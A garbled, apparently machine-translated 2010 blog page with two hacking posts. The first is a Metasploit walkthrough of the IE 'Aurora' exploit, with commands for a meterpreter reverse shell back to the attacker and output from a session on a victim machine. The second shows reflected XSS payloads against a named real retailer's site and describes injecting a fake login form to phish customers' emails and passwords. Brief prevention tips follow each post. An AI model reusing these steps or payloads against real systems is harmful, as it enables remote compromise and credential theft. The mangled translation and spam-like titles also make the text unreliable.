Tuesday, February 9, 2010

Where To Find White Tredsafes

Laboratory - Metasploit - Phishing Exploit


Well I think everyone should know the 0 day is so much talk in recent times on IE, which achieved a BOF can inject arbitrary code by obtaining a shell, but not all are vulnerable is a little board that shows how well are standing some versions of windows together with the version of IE, but now knowing that it detected the virus ..


Image
http://elladodelmal.blogspot.com/


The laboratory is composed of a Virtual Machine (VirtualBox, in the next post I will explain how to install it with yapa Hacking!) having azap installed a Windows XP SP3 with Internet Explorer version 6.0, which is completely vulnerable. Luckily it is very rare to find customers browsing with that version, but .... :). Je ..

Starting nesesitas the metasploit first time, we can download from here , search for linux architecture is 32-bit and 64 bit (I download this
framework-3.3.3 linux-x86_6
4.run ), is also for windows but the last one did not have the exploit lower aurora, but can be added by downloading the expanse rb file and place it in the folder exploit / windows / browser that would be ideal. Here
the exploit. Once installed the metasploit, and everything has gone well (in linux nesesitas intalar ruby), go to metasploit console.
/ home / user # msfconsole


_ _ _ + - --= [320 exploits - 99 auxiliary + - --= [217 payloads - 20 encoders - 6 nops = [svn r8438 updated yesterday (2010.02.09) msf>

Once
within the Metasploit console, we have to choose the exploit to use


msf> use windows
/ browser / ie_aurora

msf exploit (
ie_aurora
)>
show options Module options:

Name Current Setting Required Description ---- --------------- -------- -----------

yes SRVHOST 0.0.0.0 The
local host to listen on. SRVPORT
8080 yes The local port to listen on.
not Negotiate SSL false SSL for incoming connections SSLVersion
SSL3 not Specify the version of SSL That Should Be used (Accepted: SSL2, SSL3, TLS1)
URIPATH not The URI to use for this exploit (default is random)
Exploit target:
Id Name - ---- 0 Automatic

Once loaded the exploit to use command, we can see the arguments nesesita the exploit to run the command show options
. payload will use a reverse shell, to put it as follows.


msf exploit ( ie_aurora
)> September PAYLOAD windows / meterpreter / reverse_tcp PAYLOAD => windows / meterpreter / reverse_tcp



Well started to fill the arguments of both the Payload and the EXPLOIT
msf exploit (
ie_aurora
)> September
190.18x.xxx.xxx

Lhoste Lhoste => 190.18x.xx.xxx
msf exploit ( ie_aurora )> September URIPATH /
URIPATH => / msf exploit (
ie_aurora
)> show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 0.0.0.0 yes The local host to listen on. SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH / no The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process Exit yes technique: seh, thread, process
Lhoste 190.18x.xx.xxx yes The local address lport 
 yes The local port 4444 
 
 
 Exploit target: Id Name 
 
 
 - 0 ---- Automatic 
 
 
 
 
 
 The screen looks like it loaded Lhoste setearon values \u200b\u200bwould come to be the ip of the attacker. Largo 
 exploit
msf exploit (
ie_aurora
)>

exploit [*] Exploit running as background job.
msf exploit (
 ie_aurora )>  [*] Started on reverse handler 190.18x.xx.xxx: 4444 
 [*] Using URL: http://0.0.0.0:8080/  [*] Local IP: http://190.18x.xx.xxx:8080/  [*] Server started.   
 
 
 The server I have it running on the argument Lhoste IP on port 8080 and have a reverse shell on port 4444:). 
 Now send the link to the victim, and we hope to enter. 
 
 
 
 
 
 Let our metasploit console:) 
 
 
 
 
 
 [*] Sending Microsoft Internet Explorer "Aurora" Memory Corruption 190.18x.xx.xxx 
 to client [*] Sending Stage (725,504 bytes) 
 [*] Meterpreter session 1 OPEN (190.18x.xx.xxx: 4444 -> 190.18x.xx.xxx: 51513)
sessions-l
Active sessions =============== Id Description Tunnel
- ----------- ------ 1 Meterpreter 190.18x.xx . xxx: 4444 -> 190.18x.xx.xxx: 51513
msf exploit (
ie_aurora
)> sessions-i 1 
  [*] Starting interaction with 1 ...  meterpreter> sysinfo   
 Computer: VICTIM 
 OS: Windows XP (Build 2600, Service Pack 3). 
 Arch: x86
Language: en_US 




 see that we have the session with the victim, who has a Windows XP SP3.  Now for the remote shell is the best:)      
  
 meterpreter >   shell    Process 812 created.  Channel 1 created. 
 Microsoft Windows XP [Versi�n 5.1.2600] 
 (C) Copyright 1985-2001 Microsoft Corp.    C:\Documents and Settings\Victima 10\Escritorio>  hostname   
 hostname 
 victima 
  
 C:\Documents and Settings\Victima 10\Escritorio> 
  
  
  
  
  
 Solucion 
  
  
 Navegar con un antivirus para este exploit seria lo mejor el NOD32 lo detecta y no deja inyectar, tambien no usar un IE explorer anticuado asi como el 6.x que fue hecho en esta POC. Mientras pasen cosas parecidas dejar de utilizar el software defectuoso hasta Company that owns the patch of the same length for each program there is always another that performs the same action, choosing this temporarlmente. 
 
 
 
 
 
 References: 
 
 http://blog.metasploit.com/2010/01/reproducing-aurora-ie-exploit.html 
 
 
 
 http://foro.elhacker.net/hacking_avanzado/metasploit_0day_ie_exploit_ieaurora "Greetings 
 
 
 t281678.0.html

Posted by admin at 7:30 PM 0 comments

Monday, February 1, 2010

Luggage Combination Reset

ie_aurora via XSS (POC Luis A. Square) Denial of Service elhacker.net

Well as fashionable walk all that is


XSS, and the amount of 
  sites vulnerable to them, I will show one of its many uses deception. First is    Phishing is the how to deceive the victim 
 
   believe that making a site 
 
 confidence when in fact one evil, in order to steal data (name, username, passwords, credit card 
 
, etc.). 
 There is a difference with the common

phishing what is the Phishing


through XSS. Example: suppose we are a customer of a bancoX , and their income is http://bancoX.com/login.php page, an attacker could

encourage the victim

through some form of engineering

enter your social site made by evil, has 
 
 
 
 telling him to believe that in the original, where the site is http://sitiomaligno/bancoX/login.php evil. 
 So one way to always verify that this is a phishing 
 
 
 direction is to look at our 
 
 
 browser and make sure we are where we wanted 
 
 enter. The     with 
 XSS Phishing 
  is much more efficient, because the attacker exploits the trust that the customer has with that domain, and by injection  HTML 
 can fool the person requesting the data, and the user can 
 Watch 
 
 
 address your browser 
 
 and effective

mind will



positioned in the right 
 site you trust.   For better understanding, I will show a real 
 
 site, which is the site of 
 Luis A. 
 square. This company is by far the most prestigious sales 
 computer inputs 
   of Corrientes and Resistencia Chaco Capital, but does not seem to care much about the safety of their customers. 
 What caught my attention 
 
 was this link, 
 http://www.luiscuadrado.com/login.php 
, and that's when I decided
to this article.





Being user of products we buy and where they can be sent to the address.

CHECKING THE FAILURE Well the fault lies in a variable, $

_id products, which it does is take a number to a query to its database, and then brings of the product information concerned. Now if the number passed $

products _id = 1249, also
all the info
of this article with id = 1249, the value is printed on the screen without passing through any filter :).
First Example: http://www.luiscuadrado.com/product_info.php?products_id=1249% 20% 3 Cscript% 3Ealert% 28123% 29% 3C/script% 3E opps ! XSS !.
now see something more beautiful, and more detail what you did was create a script in php with a form asking Email and Password, and that data is saved to a text file, the injection is through an iframe . Second Example: http://www.luiscuadrado.c om / product_info.php? Products_id = 1249% 20% 3Ciframe% 20src = http://www.google.com% 20height =% 22300% 2 2%
20 width =% 22800% 22% 3E% 3C / iframe % 3E Google
square on the page! je .. Now there is something better, which is NDRI do what we were talking insert a form asking for email and password ..

See form logging , quietly you can fool people asking for your keys and then get into the system. (Currently not the link and I'll upload the php
to create a server friend to see it PC from browser ). The data is stored in a txt file

.




The
scenario is ready, it only
that would
is to use the imagination to deceive their customers. And perhaps have some input of computing more! XD

Prevention:

All variables shown the screen should be passed by filter
, not to have this kind of problem,
obviously it depends on the quality of the programmer, since not only faced with XSS but also or CRSF XSRF where that gets hurt is the end user. recommend using aggregates as

Noscript for firefox , and always be aware of possible mail, sms , messages for msn , we send a site where we ask our users and data X any reason, be sure that where we are is who they claim to be.! More
Documentation


http://itfreekzone.blogspot.com/2009/12/cruzando-informacion-cross-site.html http://itfreekzone.blogspot. com/2009/12/rompiendo-lo-grande-xss-avanzado.html


Greetings!



Posted by admin at 9:54 AM 0 comments
Subscribe to: Comments (Atom)